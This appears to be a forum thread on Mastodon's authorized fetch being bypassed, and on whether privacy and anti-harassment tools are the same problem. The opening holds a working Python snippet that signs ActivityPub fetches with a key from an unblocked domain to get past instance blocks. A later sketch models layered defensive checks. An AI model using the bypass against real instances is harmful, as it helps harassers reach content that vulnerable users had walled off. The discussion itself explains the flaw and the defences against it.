Authorized Fetch (also referred to as Secure Mode in Mastodon) was recently circumvented by a stupidly easy trick: just sign your fetch requests with a key from some other domain.
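
To make the hole concrete, here is a minimal, hypothetical sketch of what a signed ("authorized") fetch looks like, written in Python with the `requests` and `cryptography` libraries. The domains, path, key file and keyId below are made up for illustration; the point is that the signature only proves possession of whatever key the keyId points at, so a blocked operator can simply publish an actor key on a fresh, unblocked domain and sign with that.

```python
# Hypothetical sketch: an HTTP-Signatures-signed ActivityPub fetch.
# Domains, paths and key material are illustrative, not real endpoints.
import base64
from datetime import datetime, timezone
from email.utils import format_datetime

import requests
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding

TARGET = "targetserver.example"        # instance running authorized fetch
PATH = "/users/alice/statuses/1"       # object we want to read
# Nothing ties this keyId to the fetching server's real identity: a blocked
# operator can host an actor (and key) on any fresh, unblocked domain.
KEY_ID = "https://innocuous-domain.example/actor#main-key"

with open("actor_private_key.pem", "rb") as f:
    private_key = serialization.load_pem_private_key(f.read(), password=None)

date = format_datetime(datetime.now(timezone.utc), usegmt=True)
signing_string = (
    f"(request-target): get {PATH}\n"
    f"host: {TARGET}\n"
    f"date: {date}"
)
signature = base64.b64encode(
    private_key.sign(signing_string.encode(), padding.PKCS1v15(), hashes.SHA256())
).decode()

headers = {
    "Host": TARGET,
    "Date": date,
    "Accept": "application/activity+json",
    "Signature": (
        f'keyId="{KEY_ID}",algorithm="rsa-sha256",'
        f'headers="(request-target) host date",signature="{signature}"'
    ),
}

# The receiving server resolves KEY_ID to verify the signature, so unless
# that domain is itself blocked, the fetch is treated as authorized.
print(requests.get(f"https://{TARGET}{PATH}", headers=headers).status_code)
```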

  • AdaA

    Privacy and being free of (in-context) harassment aren’t the same thing.

    They’re related. Often, the ability to limit your audience is about making it non-trivial for harassers to access your content, rather than impossible.

    If the goal is privacy so that people who aren’t in the community don’t know that you’re in the community

    That’s not the goal. The goal is to make a community that lets vulnerable folk communicate whilst keeping the harassment to a manageable level and making the sensitive content non-trivial to access for random trolls and harassers.

    It’s not about stopping dedicated individuals, because they can’t be stopped in this sort of environment, for all the reasons you point out. It’s about minimising harassment from the random drive-by bigots.

    • PeriodicallyPedantic@lemmy.ca

      Hmmm I think I understand the intent. I’ll have to think on it some more.

      My gut tells me that protecting people from drive-by bigotry is antithetical to content/community discovery. And what is a social network without the ability to find new communities to join or new content to see?

      Perhaps something like Reddit, where communities can raise the bar for commenting/posting until you’ve built up karma within the community? That’s not a privacy thing, though.

      What would this look like to you, and how does it relate to privacy? I’ve got my own biases that affect how I’m looking at the problem, so I’d be interested in getting another perspective.

      • AdaA

        You’re thinking about this in an all-or-nothing way. A community in which everyone and everything they post is open to everyone isn’t safe.

        A community in which no one can find members or content unless they’re already connected to that community stagnates and dies.

        What we need is a community where some content and some people are public, and some content and some people are locked down. Though it’s imperfect, things like authorised fetch bring us closer to that, and that’s the niche that future security improvements on the Fediverse need to address.

        No one is looking for perfect, at least not in this space.

        • PeriodicallyPedantic@lemmy.ca

          I don’t think I’m looking for perfect; I’m looking for “good enough”, and while authorized fetch is better than nothing, it’s nowhere near “good enough” to be calling anything “private”.

          I’m thinking that maybe we need to reconsider what it looks like to protect people from harassment in the context of social media, compared to how we’re currently using half-functional privacy tools to accomplish it.

          • AdaA

            I’m not saying existing features are good enough.

            I’m saying that they’re better than the alternative that started this conversation.

            “Just loudly proclaim that everything is public but clients can filter out shit you don’t wanna see”

            That’s what Twitter does right now. It’s also a hate-filled cesspit.

            The Fediverse, though, even with its own hate-filled cesspits, gives us tools that put barriers between vulnerable groups and those spaces. The barriers are imperfect; they have holes and can be climbed over by people who put the effort in, but they still block the worst of it.

            • PeriodicallyPedantic@lemmy.ca

              Right, but what I’m saying is that the problem of privacy is different from the problem of harassment.

              I’m not saying that we should give up on anti-harassment tools, just that anti-harassment tools bolted onto privacy tools can’t work, because those privacy tools will be hamstrung by necessity, and I think there must be better solutions.

              Having people think that there is privacy on a social network causes harm, because people change their behavior based on that unfulfilled expectation of privacy. I suspect there is a way to give up privacy and still solve the problem of harassment. That solution doesn’t have to look like Twitter, but I have my own biases that may negatively affect how my ideas would work in practice.

              So I’m asking you:

              What might an anti-harassment tool look like on a social network without any pretenses of privacy?

              • AdaA

                What might an anti-harassment tool look like on a social network without any pretenses of privacy?

                There’s no such thing. They are mutually exclusive. Take queer folk for example. We need privacy to be able to talk about our experiences without outing ourselves to the world. It’s especially important for queer kids, and folk that are still in the closet. If they don’t have privacy, they can’t be part of the community, because they open themselves to recognition and harassment in offline spaces.

                With privacy, they can exist in those spaces. It won’t stop a dedicated harasser, but it provides a barrier and stops casual outing.

                An “open network” where everyone can see everything puts the onus on the minority person. Drive-by harassers exist in greater numbers than a vulnerable person can cope with, and when their content is a simple search and a throwaway account away from abuse, it means the vulnerable person won’t be there. Blocking them after the fact means nothing.

                • PeriodicallyPedantic@lemmy.ca

                  An “open network” where everyone can see everything puts the onus on the minority person

                  But isn’t this already the case?

                  You make a good point about people still in the closet. That’s an excellent use case for privacy. But I still believe that’s a different issue. And in fact this is my great concern: people think they have privacy when they don’t, so they say things that out themselves (as any kind of minority) accidentally, because they mistakenly relied on the network’s privacy.

                  You’re right though, it’s not all-or-nothing, but I do think these are two separate problems that can and maybe should have different solutions.

                  The type of drive-by harassment you describe is by online randos, not in-person. For those situations, is it not enough that you remain oblivious to the attempted harassment? If a bigot harasses in a forest and nobody is around to hear it, did they really harass?

                  • AdaA

                    is it not enough that you remain oblivious to the attempted harassment? If a bigot harasses in a forest and nobody is around to hear it, did they really harass?

                    The problem is, there are plenty of other people around to hear it. Everyone except the harassed person can see it, and on top of that, the fact that harassment is trivial to do, and not policed, ensures that more harassers will come along, each one having to be blocked one by one by the people they’re harassing, after the harassment has already taken place.

                    As I said earlier, this is how Twitter does things, and there is a reason that vulnerable folk don’t use Twitter anymore.

                    But isn’t this already the case?

                    No, it isn’t, because right now, local-only posting, follower-only posting, authorised fetch, admin-level instance blocks, etc., all combine to make it non-trivial for harassers. If you’re familiar with the “Swiss cheese defence model”, that’s basically what we have here (sketched below). Every single one of those things can be worked around, especially by someone dedicated to harassing folk, but the casual trolls and bigots won’t get through all of them. The more imperfect security, anti-harassment and privacy options we have, the harder it is for casual bigots.
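
A rough sketch of that layering in Python, with a made-up Request shape and hypothetical checks (this is not Mastodon’s or Lemmy’s actual code): no single layer is airtight, but a casual drive-by fetch has to slip through all of them at once.

```python
# Hypothetical "swiss cheese" layering of imperfect anti-harassment checks.
# The Request shape and helper names are illustrative only.
from dataclasses import dataclass
from typing import Optional


@dataclass
class Request:
    signer_domain: Optional[str]   # domain the HTTP signature resolved to, if any
    post_visibility: str           # "public", "local" or "followers"
    signer_follows_author: bool


def blocked_domains() -> set:
    return {"troll-instance.example"}   # admin-level instance blocks


def allow_fetch(req: Request) -> bool:
    # Layer 1: authorized fetch. Unsigned requests are refused outright.
    if req.signer_domain is None:
        return False
    # Layer 2: instance blocks. Known-bad domains are refused (bypassable
    # by signing from another domain, as in the circumvention above).
    if req.signer_domain in blocked_domains():
        return False
    # Layer 3: visibility. Local-only and followers-only posts are not
    # handed out to arbitrary remote signers.
    if req.post_visibility == "local":
        return False
    if req.post_visibility == "followers" and not req.signer_follows_author:
        return False
    return True


print(allow_fetch(Request("random.example", "followers", False)))  # False
print(allow_fetch(Request("random.example", "public", False)))     # True
```

Each layer here can be worked around on its own (the domain-signing trick above punches straight through layer 2), but a casual harasser has to line up holes in every layer at once, which is the point of the model.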